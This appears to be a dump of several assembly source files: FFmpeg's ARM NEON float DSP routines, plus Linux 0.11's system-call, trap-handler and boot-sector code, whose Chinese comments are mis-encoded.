.ifnb \gp
.if .Lpic_gp
.unreq gp
.endif
gp .req \gp
ldpic gp, _GLOBAL_OFFSET_TABLE_
.elseif !.Lpic_gp
gp .req r12
ldpic gp, _GLOBAL_OFFSET_TABLE_
.endif
.set .Lpic_gp, 1
ldr \rd, .Lpicoff\@
ldr \rd, [gp, \rd]
def_pic \val(GOT), .Lpicoff\@
#elif CONFIG_PIC && defined(__APPLE__)
ldpic \rd, .Lpic\@, indir=1
.non_lazy_symbol_pointer
.Lpic\@:
.indirect_symbol \val
.word 0
.text
#else
movrel \rd, \val
#endif
.endm
.macro add_sh rd, rn, rm, sh:vararg
A add \rd, \rn, \rm, \sh
T mov \rm, \rm, \sh
T add \rd, \rn, \rm
.endm
.macro ldr_pre rt, rn, rm:vararg
A ldr \rt, [\rn, \rm]!
T add \rn, \rn, \rm
T ldr \rt, [\rn]
.endm
.macro ldr_dpre rt, rn, rm:vararg
A ldr \rt, [\rn, -\rm]!
T sub \rn, \rn, \rm
T ldr \rt, [\rn]
.endm
.macro ldr_nreg rt, rn, rm:vararg
A ldr \rt, [\rn, -\rm]
T sub \rt, \rn, \rm
T ldr \rt, [\rt]
.endm
.macro ldr_post rt, rn, rm:vararg
A ldr \rt, [\rn], \rm
T ldr \rt, [\rn]
T add \rn, \rn, \rm
.endm
.macro ldrc_pre cc, rt, rn, rm:vararg
A ldr\cc \rt, [\rn, \rm]!
T itt \cc
T add\cc \rn, \rn, \rm
T ldr\cc \rt, [\rn]
.endm
.macro ldrd_reg rt, rt2, rn, rm
A ldrd \rt, \rt2, [\rn, \rm]
T add \rt, \rn, \rm
T ldrd \rt, \rt2, [\rt]
.endm
.macro ldrd_post rt, rt2, rn, rm
A ldrd \rt, \rt2, [\rn], \rm
T ldrd \rt, \rt2, [\rn]
T add \rn, \rn, \rm
.endm
.macro ldrh_pre rt, rn, rm
A ldrh \rt, [\rn, \rm]!
T add \rn, \rn, \rm
T ldrh \rt, [\rn]
.endm
.macro ldrh_dpre rt, rn, rm
A ldrh \rt, [\rn, -\rm]!
T sub \rn, \rn, \rm
T ldrh \rt, [\rn]
.endm
.macro ldrh_post rt, rn, rm
A ldrh \rt, [\rn], \rm
T ldrh \rt, [\rn]
T add \rn, \rn, \rm
.endm
.macro ldrb_post rt, rn, rm
A ldrb \rt, [\rn], \rm
T ldrb \rt, [\rn]
T add \rn, \rn, \rm
.endm
.macro str_post rt, rn, rm:vararg
A str \rt, [\rn], \rm
T str \rt, [\rn]
T add \rn, \rn, \rm
.endm
.macro strb_post rt, rn, rm:vararg
A strb \rt, [\rn], \rm
T strb \rt, [\rn]
T add \rn, \rn, \rm
.endm
.macro strd_post rt, rt2, rn, rm
A strd \rt, \rt2, [\rn], \rm
T strd \rt, \rt2, [\rn]
T add \rn, \rn, \rm
.endm
.macro strh_pre rt, rn, rm
A strh \rt, [\rn, \rm]!
T add \rn, \rn, \rm
T strh \rt, [\rn]
.endm
.macro strh_dpre rt, rn, rm
A strh \rt, [\rn, -\rm]!
T sub \rn, \rn, \rm
T strh \rt, [\rn]
.endm
.macro strh_post rt, rn, rm
A strh \rt, [\rn], \rm
T strh \rt, [\rn]
T add \rn, \rn, \rm
.endm
.macro strh_dpost rt, rn, rm
A strh \rt, [\rn], -\rm
T strh \rt, [\rn]
T sub \rn, \rn, \rm
.endm
#if HAVE_VFP_ARGS
ELF .eabi_attribute 28, 1
# define VFP
# define NOVFP @
#else
# define VFP @
# define NOVFP
#endif
#define GLUE(a, b) a ## b
#define JOIN(a, b) GLUE(a, b)
#define X(s) JOIN(EXTERN_ASM, s)
|
Akagi201/ffmpeg-xcode
| 9,779
|
ffmpeg-3.0.2/libavutil/arm/float_dsp_neon.S
|
/*
* ARM NEON optimised Float DSP functions
* Copyright (c) 2008 Mans Rullgard <mans@mansr.com>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "config.h"
#include "asm.S"
function ff_vector_fmul_neon, export=1
subs r3, r3, #8
vld1.32 {d0-d3}, [r1,:128]!
vld1.32 {d4-d7}, [r2,:128]!
vmul.f32 q8, q0, q2
vmul.f32 q9, q1, q3
beq 3f
bics ip, r3, #15
beq 2f
1: subs ip, ip, #16
vld1.32 {d0-d1}, [r1,:128]!
vld1.32 {d4-d5}, [r2,:128]!
vmul.f32 q10, q0, q2
vld1.32 {d2-d3}, [r1,:128]!
vld1.32 {d6-d7}, [r2,:128]!
vmul.f32 q11, q1, q3
vst1.32 {d16-d19},[r0,:128]!
vld1.32 {d0-d1}, [r1,:128]!
vld1.32 {d4-d5}, [r2,:128]!
vmul.f32 q8, q0, q2
vld1.32 {d2-d3}, [r1,:128]!
vld1.32 {d6-d7}, [r2,:128]!
vmul.f32 q9, q1, q3
vst1.32 {d20-d23},[r0,:128]!
bne 1b
ands r3, r3, #15
beq 3f
2: vld1.32 {d0-d1}, [r1,:128]!
vld1.32 {d4-d5}, [r2,:128]!
vst1.32 {d16-d17},[r0,:128]!
vmul.f32 q8, q0, q2
vld1.32 {d2-d3}, [r1,:128]!
vld1.32 {d6-d7}, [r2,:128]!
vst1.32 {d18-d19},[r0,:128]!
vmul.f32 q9, q1, q3
3: vst1.32 {d16-d19},[r0,:128]!
bx lr
endfunc
function ff_vector_fmac_scalar_neon, export=1
VFP len .req r2
VFP acc .req r3
NOVFP len .req r3
NOVFP acc .req r2
VFP vdup.32 q15, d0[0]
NOVFP vdup.32 q15, r2
bics r12, len, #15
mov acc, r0
beq 3f
vld1.32 {q0}, [r1,:128]!
vld1.32 {q8}, [acc,:128]!
vld1.32 {q1}, [r1,:128]!
vld1.32 {q9}, [acc,:128]!
1: vmla.f32 q8, q0, q15
vld1.32 {q2}, [r1,:128]!
vld1.32 {q10}, [acc,:128]!
vmla.f32 q9, q1, q15
vld1.32 {q3}, [r1,:128]!
vld1.32 {q11}, [acc,:128]!
vmla.f32 q10, q2, q15
vst1.32 {q8}, [r0,:128]!
vmla.f32 q11, q3, q15
vst1.32 {q9}, [r0,:128]!
subs r12, r12, #16
beq 2f
vld1.32 {q0}, [r1,:128]!
vld1.32 {q8}, [acc,:128]!
vst1.32 {q10}, [r0,:128]!
vld1.32 {q1}, [r1,:128]!
vld1.32 {q9}, [acc,:128]!
vst1.32 {q11}, [r0,:128]!
b 1b
2: vst1.32 {q10}, [r0,:128]!
vst1.32 {q11}, [r0,:128]!
ands len, len, #15
it eq
bxeq lr
3: vld1.32 {q0}, [r1,:128]!
vld1.32 {q8}, [acc,:128]!
vmla.f32 q8, q0, q15
vst1.32 {q8}, [r0,:128]!
subs len, len, #4
bgt 3b
bx lr
.unreq len
endfunc
function ff_vector_fmul_scalar_neon, export=1
VFP len .req r2
NOVFP len .req r3
VFP vdup.32 q8, d0[0]
NOVFP vdup.32 q8, r2
bics r12, len, #15
beq 3f
vld1.32 {q0},[r1,:128]!
vld1.32 {q1},[r1,:128]!
1: vmul.f32 q0, q0, q8
vld1.32 {q2},[r1,:128]!
vmul.f32 q1, q1, q8
vld1.32 {q3},[r1,:128]!
vmul.f32 q2, q2, q8
vst1.32 {q0},[r0,:128]!
vmul.f32 q3, q3, q8
vst1.32 {q1},[r0,:128]!
subs r12, r12, #16
beq 2f
vld1.32 {q0},[r1,:128]!
vst1.32 {q2},[r0,:128]!
vld1.32 {q1},[r1,:128]!
vst1.32 {q3},[r0,:128]!
b 1b
2: vst1.32 {q2},[r0,:128]!
vst1.32 {q3},[r0,:128]!
ands len, len, #15
it eq
bxeq lr
3: vld1.32 {q0},[r1,:128]!
vmul.f32 q0, q0, q8
vst1.32 {q0},[r0,:128]!
subs len, len, #4
bgt 3b
bx lr
.unreq len
endfunc
function ff_vector_fmul_window_neon, export=1
push {r4,r5,lr}
ldr lr, [sp, #12]
sub r2, r2, #8
sub r5, lr, #2
add r2, r2, r5, lsl #2
add r4, r3, r5, lsl #3
add ip, r0, r5, lsl #3
mov r5, #-16
vld1.32 {d0,d1}, [r1,:128]!
vld1.32 {d2,d3}, [r2,:128], r5
vld1.32 {d4,d5}, [r3,:128]!
vld1.32 {d6,d7}, [r4,:128], r5
1: subs lr, lr, #4
vmul.f32 d22, d0, d4
vrev64.32 q3, q3
vmul.f32 d23, d1, d5
vrev64.32 q1, q1
vmul.f32 d20, d0, d7
vmul.f32 d21, d1, d6
beq 2f
vmla.f32 d22, d3, d7
vld1.32 {d0,d1}, [r1,:128]!
vmla.f32 d23, d2, d6
vld1.32 {d18,d19},[r2,:128], r5
vmls.f32 d20, d3, d4
vld1.32 {d24,d25},[r3,:128]!
vmls.f32 d21, d2, d5
vld1.32 {d6,d7}, [r4,:128], r5
vmov q1, q9
vrev64.32 q11, q11
vmov q2, q12
vswp d22, d23
vst1.32 {d20,d21},[r0,:128]!
vst1.32 {d22,d23},[ip,:128], r5
b 1b
2: vmla.f32 d22, d3, d7
vmla.f32 d23, d2, d6
vmls.f32 d20, d3, d4
vmls.f32 d21, d2, d5
vrev64.32 q11, q11
vswp d22, d23
vst1.32 {d20,d21},[r0,:128]!
vst1.32 {d22,d23},[ip,:128], r5
pop {r4,r5,pc}
endfunc
function ff_vector_fmul_add_neon, export=1
ldr r12, [sp]
vld1.32 {q0-q1}, [r1,:128]!
vld1.32 {q8-q9}, [r2,:128]!
vld1.32 {q2-q3}, [r3,:128]!
vmul.f32 q10, q0, q8
vmul.f32 q11, q1, q9
1: vadd.f32 q12, q2, q10
vadd.f32 q13, q3, q11
pld [r1, #16]
pld [r2, #16]
pld [r3, #16]
subs r12, r12, #8
beq 2f
vld1.32 {q0}, [r1,:128]!
vld1.32 {q8}, [r2,:128]!
vmul.f32 q10, q0, q8
vld1.32 {q1}, [r1,:128]!
vld1.32 {q9}, [r2,:128]!
vmul.f32 q11, q1, q9
vld1.32 {q2-q3}, [r3,:128]!
vst1.32 {q12-q13},[r0,:128]!
b 1b
2: vst1.32 {q12-q13},[r0,:128]!
bx lr
endfunc
function ff_vector_fmul_reverse_neon, export=1
add r2, r2, r3, lsl #2
sub r2, r2, #32
mov r12, #-32
vld1.32 {q0-q1}, [r1,:128]!
vld1.32 {q2-q3}, [r2,:128], r12
1: pld [r1, #32]
vrev64.32 q3, q3
vmul.f32 d16, d0, d7
vmul.f32 d17, d1, d6
pld [r2, #-32]
vrev64.32 q2, q2
vmul.f32 d18, d2, d5
vmul.f32 d19, d3, d4
subs r3, r3, #8
beq 2f
vld1.32 {q0-q1}, [r1,:128]!
vld1.32 {q2-q3}, [r2,:128], r12
vst1.32 {q8-q9}, [r0,:128]!
b 1b
2: vst1.32 {q8-q9}, [r0,:128]!
bx lr
endfunc
function ff_butterflies_float_neon, export=1
1: vld1.32 {q0},[r0,:128]
vld1.32 {q1},[r1,:128]
vsub.f32 q2, q0, q1
vadd.f32 q1, q0, q1
vst1.32 {q2},[r1,:128]!
vst1.32 {q1},[r0,:128]!
subs r2, r2, #4
bgt 1b
bx lr
endfunc
function ff_scalarproduct_float_neon, export=1
vmov.f32 q2, #0.0
1: vld1.32 {q0},[r0,:128]!
vld1.32 {q1},[r1,:128]!
vmla.f32 q2, q0, q1
subs r2, r2, #4
bgt 1b
vadd.f32 d0, d4, d5
vpadd.f32 d0, d0, d0
NOVFP vmov.32 r0, d0[0]
bx lr
endfunc
|
Akagi201/linux-0.11
| 8,583
|
kernel/system_call.s
|
/*
* linux/kernel/system_call.s
*
* (C) 1991 Linus Torvalds
*/
/*
* system_call.s contains the system-call low-level handling routines.
* This also contains the timer-interrupt handler, as some of the code is
* the same. The hd- and flopppy-interrupts are also here.
*
* NOTE: This code handles signal-recognition, which happens every time
* after a timer-interrupt and after each system call. Ordinary interrupts
* don't handle signal-recognition, as that would clutter them up totally
* unnecessarily.
*
* Stack layout in 'ret_from_system_call':
*
* 0(%esp) - %eax
* 4(%esp) - %ebx
* 8(%esp) - %ecx
* C(%esp) - %edx
* 10(%esp) - %fs
* 14(%esp) - %es
* 18(%esp) - %ds
* 1C(%esp) - %eip
* 20(%esp) - %cs
* 24(%esp) - %eflags
* 28(%esp) - %oldesp
* 2C(%esp) - %oldss
*/
/*
* system_call.s ļϵͳ(system-call)ײ㴦ӳЩȽƣ
* ͬʱҲʱжϴ(timer-interrupt)Ӳ̵̺жϴҲ
*
* ע⣺δ봦ź(signal)ʶÿʱжϺϵͳ֮ʶһ
* жźŲźʶΪϵͳɻҡ
*
* ϵͳ÷أ'ret_from_system_call'ʱջݼ19-30 С
*/
SIG_CHLD = 17 # SIG_CHLD źţӽֹͣ
EAX = 0x00 # ջиĴƫλá
EBX = 0x04
ECX = 0x08
EDX = 0x0C
FS = 0x10
5.5 system_call.s
ES = 0x14
DS = 0x18
EIP = 0x1C
CS = 0x20
EFLAGS = 0x24
OLDESP = 0x28 # Ȩ仯ʱ
OLDSS = 0x2C
# Щṹ(task_struct)бƫֵμinclude/linux/sched.h77 пʼ
state = 0 # these are offsets into the task-struct. # ״̬
counter = 4 # ʱ(ݼ)δʱƬ
priority = 8 // ʼʱcounter=priorityԽʱԽ
signal = 12 // źλͼÿλһźţźֵ=λƫֵ+1
sigaction = 16 # MUST be 16 (=len of sigaction) // sigaction ṹȱ16 ֽڡ
// źִԽṹƫֵӦźŽҪִеIJͱ־Ϣ
blocked = (33*16) // źλͼƫ
# ¶sigaction ṹеƫμinclude/signal.h48 пʼ
# offsets within sigaction
sa_handler = 0 // źŴ̵ľ
sa_mask = 4 // ź
sa_flags = 8 // źż
sa_restorer = 12 // ػִָеĵַλá
nr_system_calls = 72 # Linux 0.11 ںеϵͳ
/*
* Ok, I get parallel printer interrupts while using the floppy for some
* strange reason. Urgel. Now I just ignore them.
*/
/*
* ˣʹʱյ˲дӡжϣ֡ǣڲ
*/
# ڵ㡣
.globl _system_call,_sys_fork,_timer_interrupt,_sys_execve
.globl _hd_interrupt,_floppy_interrupt,_parallel_interrupt
.globl _device_not_available, _coprocessor_error
# ϵͳúš
.align 2 # ڴ4 ֽڶ롣
bad_sys_call:
movl $-1,%eax # eax -1˳жϡ
iret
# ִеȳڡȳschedule (kernel/sched.c,104)
.align 2
reschedule:
pushl $ret_from_sys_call # ret_from_sys_call ĵַջ101 У
jmp _schedule
#### int 0x80 --linux ϵͳڵ(жint 0x80eax ǵú)
.align 2
_system_call:
cmpl $nr_system_calls-1,%eax # úΧĻeax -1 ˳
ja bad_sys_call
5.5 system_call.s
push %ds # ԭμĴֵ
push %es
push %fs
pushl %edx # ebx,ecx,edx зϵͳӦC Ժĵò
pushl %ecx # push %ebx,%ecx,%edx as parameters
pushl %ebx # to the system call
movl $0x10,%edx # set up ds,es to kernel space
mov %dx,%ds # ds,es ָںݶ(ȫݶ)
mov %dx,%es
movl $0x17,%edx # fs points to local data space
mov %dx,%fs # fs ֲָݶ(ֲݶ)
# ĺǣõַ = _sys_call_table + %eax * 4μб˵
# ӦC еsys_call_table include/linux/sys.h Ужһ72
# ϵͳC ĵַ
call _sys_call_table(,%eax,4)
pushl %eax # ϵͳúջ
movl _current,%eax # ȡǰ̣ݽṹַ??eax
# 97-100 в鿴ǰ״̬ھ״̬(state 0)ȥִеȳ
# ھ״̬counter[??]ֵ0Ҳȥִеȳ
cmpl $0,state(%eax) # state
jne reschedule
cmpl $0,counter(%eax) # counter
je reschedule
# δִдϵͳC غźʶ
ret_from_sys_call:
# бǰǷdzʼtask0ضźĴֱӷء
# 103 ϵ_task ӦC еtask[]飬ֱtask ൱task[0]
movl _current,%eax # task[0] cannot have signals
cmpl _task,%eax
je 3f # ǰ(forward)ת3
# ͨԭóѡļжϵóǷdzûdzûֱ
# ˳жϣźĴȽѡǷΪͨûεѡ0x000f
# (RPL=3ֲ1 ())ת˳жϳ
cmpw $0x0f,CS(%esp) # was old code segment supervisor ?
jne 3f
# ԭջѡΪ0x17ҲԭջûݶУҲ˳
cmpw $0x17,OLDSS(%esp) # was stack segment = 0x17 ?
jne 3f
# δ루109-120;ȡǰṹеźλͼ(32 λÿλ1 ź)
# ȻṹеźΣ룬źλȡֵСźֵٰ
# ԭźλͼиźŶӦλλ0źֵΪ֮һdo_signal()
# do_signal()ڣkernel/signal.c,82У13 ջϢ
movl signal(%eax),%ebx # ȡźλͼ??ebxÿ1 λ1 źţ32 źš
movl blocked(%eax),%ecx # ȡΣźλͼ??ecx
notl %ecx # ÿλȡ
andl %ebx,%ecx # ɵźλͼ
bsfl %ecx,%ecx # ӵλλ0ʼɨλͼǷ1 λ
# Уecx λƫֵڼλ0-31
je 3f # ûźǰת˳
btrl %ecx,%ebx # λźţebx ԭsignal λͼ
movl %ebx,signal(%eax) # ±signal λͼϢ??current->signal
incl %ecx # źŵΪ1 ʼ(1-32)
pushl %ecx # źֵջΪdo_signal IJ֮һ
5.5 system_call.s
call _do_signal # C źŴ(kernel/signal.c,82)
popl %eax # źֵ
3: popl %eax
popl %ebx
popl %ecx
popl %edx
pop %fs
pop %es
pop %ds
iret
#### int16 -- δ봦ЭijźšתִC math_error()
# (kernel/math/math_emulate.c,82)غתret_from_sys_call ִС
.align 2
_coprocessor_error:
push %ds
push %es
push %fs
pushl %edx
pushl %ecx
pushl %ebx
pushl %eax
movl $0x10,%eax # ds,es ΪָںݶΡ
mov %ax,%ds
mov %ax,%es
movl $0x17,%eax # fs ΪֲָݶΣݶΣ
mov %ax,%fs
pushl $ret_from_sys_call # ÷صĵַջ
jmp _math_error # ִC math_error()(kernel/math/math_emulate.c,37)
#### int7 -- 豸ڻЭ(Coprocessor not available)
# ƼĴCR0 EM ־λCPU ִһESC תָʱͻжϣ
# лжϴģESC תָ169 У
# CR0 TS ־CPU ִתʱõġTS ȷʲôʱЭеݣģ
# CPU ִеƥˡCPU һתָʱTS λˣͻжϡ
# ʱӦûָЭִ״̬165 Уμ(kernel/sched.c,77)е˵
# жתƵret_from_sys_call ִȥⲢźţ
.align 2
_device_not_available:
push %ds
push %es
push %fs
pushl %edx
pushl %ecx
pushl %ebx
pushl %eax
movl $0x10,%eax # ds,es ΪָںݶΡ
mov %ax,%ds
mov %ax,%es
movl $0x17,%eax # fs ΪֲָݶΣݶΣ
mov %ax,%fs
pushl $ret_from_sys_call # תõķصַջ
clts # clear TS so that we can use math
5.5 system_call.s
movl %cr0,%eax
testl $0x4,%eax # EM (math emulation bit)
# EM жϣָЭ״̬
je _math_state_restore # ִC math_state_restore()(kernel/sched.c,77)
pushl %ebp
pushl %esi
pushl %edi
call _math_emulate # C math_emulate(kernel/math/math_emulate.c,18)
popl %edi
popl %esi
popl %ebp
ret # ret תret_from_sys_call(101 )
#### int32 -- (int 0x20) ʱжϴжƵʱΪ100Hz(include/linux/sched.h,5)
# ʱоƬ8253/8254 (kernel/sched.c,406)ʼġjiffies ÿ10 1
# δ뽫jiffies 1ͽжָ8259 ȻõǰȨΪ
# C do_timer(long CPL)÷ʱתȥⲢźš
.align 2
_timer_interrupt:
push %ds # save ds,es and put kernel data space
push %es # into them. %fs is used by _system_call
push %fs
pushl %edx # we save %eax,%ecx,%edx as gcc doesn't
pushl %ecx # save those across function calls. %ebx
pushl %ebx # is saved as we use that in ret_sys_call
pushl %eax
movl $0x10,%eax # ds,es ΪָںݶΡ
mov %ax,%ds
mov %ax,%es
movl $0x17,%eax # fs ΪֲָݶΣݶΣ
mov %ax,%fs
incl _jiffies
# ڳʼжϿоƬʱûвԶEOIҪָӲжϡ
movb $0x20,%al # EOI to interrupt controller #1
outb %al,$0x20 # OCW2 0x20 ˿ڡ
# 3 ѡȡǰȨ(0 3)ѹջΪdo_timer IJ
movl CS(%esp),%eax
andl $3,%eax # %eax is CPL (0 or 3, 0=supervisor)
pushl %eax
# do_timer(CPL)ִлʱȹkernel/shched.c,305 ʵ֡
call _do_timer # 'do_timer(long CPL)' does everything from
addl $4,%esp # task switching to accounting ...
jmp ret_from_sys_call
#### sys_execve()ϵͳáȡжϵóĴָΪC do_execve()
# do_execve()(fs/exec.c,182)
.align 2
_sys_execve:
lea EIP(%esp),%eax
pushl %eax
call _do_execve
addl $4,%esp # ʱѹջEIP ֵ
ret
5.5 system_call.s
#### sys_fork()ãڴӽ̣system_call 2ԭinclude/linux/sys.h С
# ȵC find_empty_process()ȡһ̺pidظ˵Ŀǰ
# Ȼcopy_process()ƽ̡
.align 2
_sys_fork:
call _find_empty_process # find_empty_process()(kernel/fork.c,135)
testl %eax,%eax
js 1f
push %gs
pushl %esi
pushl %edi
pushl %ebp
pushl %eax
call _copy_process # C copy_process()(kernel/fork.c,68)
addl $20,%esp # ѹջݡ
1: ret
#### int 46 -- (int 0x2E) ӲжϴӦӲжIRQ14
# Ӳ̲ɻͻᷢжźš(μkernel/blk_drv/hd.c)
# 8259A жϿƴоƬͽӲжָ(EOI)Ȼȡdo_hd еĺָedx
# ĴУdo_hd ΪNULLжedx ָǷΪաΪգedx ֵָ
# unexpected_hd_interrupt()ʾϢ8259A оƬEOI ָedx
# ָָĺ: read_intr()write_intr()unexpected_hd_interrupt()
_hd_interrupt:
pushl %eax
pushl %ecx
pushl %edx
push %ds
push %es
push %fs
movl $0x10,%eax # ds,es ΪںݶΡ
mov %ax,%ds
mov %ax,%es
movl $0x17,%eax # fs ΪóľֲݶΡ
mov %ax,%fs
# ڳʼжϿоƬʱûвԶEOIҪָӲжϡ
movb $0x20,%al
outb %al,$0xA0 # EOI to interrupt controller #1 # ʹ8259A
jmp 1f # give port chance to breathe
1: jmp 1f # ʱá
1: xorl %edx,%edx
xchgl _do_hd,%edx # do_hd Ϊһָ룬ֵread_intr()
# write_intr()ַ(kernel/blk_drv/hd.c)
# ŵedx Ĵͽdo_hd ָΪNULL
testl %edx,%edx # ԺָǷΪNull
jne 1f # գʹָָC unexpected_hd_interrupt()
movl $_unexpected_hd_interrupt,%edx # (kernel/blk_drv/hdc,237)
1: outb %al,$0x20 # 8259A жϿEOI ָӲжϣ
call *%edx # "interesting" way of handling intr.
pop %fs # Ͼdo_hd ָC
pop %es
pop %ds
5.5 system_call.s
popl %edx
popl %ecx
popl %eax
iret
#### int38 -- (int 0x26) жϴӦӲжIRQ6
# 䴦Ӳ̵Ĵһ(kernel/blk_drv/floppy.c)
# 8259A жϿоƬEOI ָȻȡdo_floppy еĺָeax
# ĴУdo_floppy ΪNULLжeax ָǷΪաΪգeax ֵָ
# unexpected_floppy_interrupt ()ʾϢeax ָĺ: rw_interrupt,
# seek_interrupt,recal_interrupt,reset_interrupt unexpected_floppy_interrupt
_floppy_interrupt:
pushl %eax
pushl %ecx
pushl %edx
push %ds
push %es
push %fs
movl $0x10,%eax # ds,es ΪںݶΡ
mov %ax,%ds
mov %ax,%es
movl $0x17,%eax # fs ΪóľֲݶΡ
mov %ax,%fs
movb $0x20,%al # 8259A жϿEOI ָӲжϣ
outb %al,$0x20 # EOI to interrupt controller #1
xorl %eax,%eax
xchgl _do_floppy,%eax # do_floppy Ϊһָ룬ֵʵʴC
# ŵeax Ĵͽdo_floppy ָÿա
testl %eax,%eax # ԺָǷ=NULL?
jne 1f # գʹָָC unexpected_floppy_interrupt()
movl $_unexpected_floppy_interrupt,%eax
1: call *%eax # "interesting" way of handling intr.
pop %fs # Ͼdo_floppy ָĺ
pop %es
pop %ds
popl %edx
popl %ecx
popl %eax
iret
#### int 39 -- (int 0x27) пжϴӦӲжźIRQ7
# 汾ں˻δʵֻ֡ǷEOI ָ
_parallel_interrupt:
pushl %eax
movb $0x20,%al
outb %al,$0x20
popl %eax
iret
|
Akagi201/linux-0.11
| 3,595
|
kernel/asm.s
|
/*
* linux/kernel/asm.s
*
* (C) 1991 Linus Torvalds
*/
/*
* asm.s contains the low-level code for most hardware faults.
* page_exception is handled by the mm, so that isn't here. This
* file also handles (hopefully) fpu-exceptions due to TS-bit, as
* the fpu must be properly saved/resored. This hasn't been tested.
eax = -1
ϵͳжϵ(eax=ú)
ebx,ecx,edx зеò
úųΧ?
жϷ
Ĵջ
ds,es ָں˴
fs ֲָݶ(û)
öӦC
״̬?
schedule() ʱƬ=0
ʼ
ջļĴ
û?
ûջ?
ݽźλͼȡ̵
Сźdo signal()
*/
5.3 asm.s
/*
* asm.s аֵӲϣĵײδ롣ҳ쳣ڴ
* mm ģԲ˳ϣTS-λɵfpu 쳣
* Ϊfpu ȷؽб/ָЩûвԹ
*/
# ļҪ漰Intel жint0--int16 Ĵint17-int31 ʹã
# һЩȫֺԭtraps.c ˵
.globl _divide_error,_debug,_nmi,_int3,_overflow,_bounds,_invalid_op
.globl _double_fault,_coprocessor_segment_overrun
.globl _invalid_TSS,_segment_not_present,_stack_segment
.globl _general_protection,_coprocessor_error,_irq13,_reserved
# int0 -- δĺμͼ4.1(a)
# DZ(divide_error)롣'_divide_error'ʵC Ժ
# divide_error()ģжӦơ'_do_divide_error'traps.c С
_divide_error:
pushl $_do_divide_error # ȰѽҪõĺַջγijΪ0
no_error_code: # Ŵڴ55 еȡ
xchgl %eax,(%esp) # _do_divide_error ĵַ ?? eaxeax ջ
pushl %ebx
pushl %ecx
pushl %edx
pushl %edi
pushl %esi
pushl %ebp
push %ds # 16 λĶμĴջҲҪռ4 ֽڡ
push %es
push %fs
pushl $0 # "error code" # ջ
lea 44(%esp),%edx # ȡԭ÷صַջָλãѹջ
pushl %edx
movl $0x10,%edx # ں˴ݶѡ
mov %dx,%ds
mov %dx,%es
mov %dx,%fs
call *%eax # C do_divide_error()
addl $8,%esp # öջָָĴfs ջ
pop %fs
pop %es
pop %ds
popl %ebp
popl %esi
popl %edi
popl %edx
popl %ecx
popl %ebx
popl %eax # ԭeax еݡ
iret
# int1 -- debug жڵ㡣ͬϡ
_debug:
5.3 asm.s
pushl $_do_int3 # _do_debug C ָջͬ
jmp no_error_code
# int2 -- жϵڵ㡣
_nmi:
pushl $_do_nmi
jmp no_error_code
# int3 -- ͬ_debug
_int3:
pushl $_do_int3
jmp no_error_code
# int4 -- жڵ㡣
_overflow:
pushl $_do_overflow
jmp no_error_code
# int5 -- ߽жڵ㡣
_bounds:
pushl $_do_bounds
jmp no_error_code
# int6 -- Чָжڵ㡣
_invalid_op:
pushl $_do_invalid_op
jmp no_error_code
# int9 -- Эγжڵ㡣
_coprocessor_segment_overrun:
pushl $_do_coprocessor_segment_overrun
jmp no_error_code
# int15 C
_reserved:
pushl $_do_reserved
jmp no_error_code
# int45 -- ( = 0x20 + 13 ) ѧЭCoprocessorжϡ
# ЭִһʱͻᷢIRQ13 жźţ֪ͨCPU ɡ
_irq13:
pushl %eax
xorb %al,%al # 80387 ִмʱCPU ȴɡ
outb %al,$0xF0 # ͨд0xF0 ˿ڣжϽCPU BUSY źţ
# 80387 ĴչPEREQòҪΪȷ
# ڼִ80387 κָ֮ǰӦжϡ
movb $0x20,%al
outb %al,$0x20 # 8259 жϿоƬEOIжϽźš
jmp 1f # תָʱá
1: jmp 1f
1: outb %al,$0xA0 # 8259 жϿоƬEOIжϽźš
popl %eax
jmp _coprocessor_error # _coprocessor_error ԭڱļУѾŵ
5.3 asm.s
# kernel/system_call.s, 131
# жڵʱжϷصַ֮ѹջ˷ʱҲҪŵ
# int8 -- ˫ϡδĺμͼ4.1(b)
_double_fault:
pushl $_do_double_fault # C ַջ
error_code:
xchgl %eax,4(%esp) # error code <-> %eaxeax ԭֵڶջϡ
xchgl %ebx,(%esp) # &function <-> %ebxebx ԭֵڶջϡ
pushl %ecx
pushl %edx
pushl %edi
pushl %esi
pushl %ebp
push %ds
push %es
push %fs
pushl %eax # error code # ջ
lea 44(%esp),%eax # offset # صַջָλֵջ
pushl %eax
movl $0x10,%eax # ںݶѡ
mov %ax,%ds
mov %ax,%es
mov %ax,%fs
call *%ebx # ӦC ջ
addl $8,%esp # ջָָջзfs ݵλá
pop %fs
pop %es
pop %ds
popl %ebp
popl %esi
popl %edi
popl %edx
popl %ecx
popl %ebx
popl %eax
iret
# int10 -- Ч״̬(TSS)
_invalid_TSS:
pushl $_do_invalid_TSS
jmp error_code
# int11 -- βڡ
_segment_not_present:
pushl $_do_segment_not_present
jmp error_code
# int12 -- ջδ
_stack_segment:
pushl $_do_stack_segment
jmp error_code
5.3 asm.s
# int13 -- һ㱣Գ
_general_protection:
pushl $_do_general_protection
jmp error_code
# int7 -- 豸(_device_not_available)(kernel/system_call.s,148)
# int14 -- ҳ(_page_fault)(mm/page.s,14)
# int16 -- Э(_coprocessor_error)(kernel/system_call.s,131)
# ʱжint 0x20 (_timer_interrupt)(kernel/system_call.s,176)
# ϵͳint 0x80 (_system_call)ڣkernel/system_call.s,80
|
Akagi201/linux-0.11
| 8,087
|
boot/bootsect.s
|
!
! SYS_SIZE is the number of clicks (16 bytes) to be loaded.
! 0x3000 is 0x30000 bytes = 196kB, more than enough for current
! versions of linux ! SYS_SIZE ҪصĽ16 ֽΪ1 ڣ0x3000 Ϊ
1 2 3 4 5 6
0x7c00
0x0000
0x90000
0x10000
0xA0000
system ģ
ִλ·
0x90200
! 0x30000 ֽ=192 kBLinus ˣڵǰİ汾ռ㹻ˡ
!
SYSSIZE = 0x3000 ! ָӺsystem ģĴСμб1.2 е92 ˵
! һĬֵ
!
! bootsect.s (C) 1991 Linus Torvalds
!
! bootsect.s is loaded at 0x7c00 by the bios-startup routines, and moves
! iself out of the way to address 0x90000, and jumps there.
!
! It then loads 'setup' directly after itself (0x90200), and the system
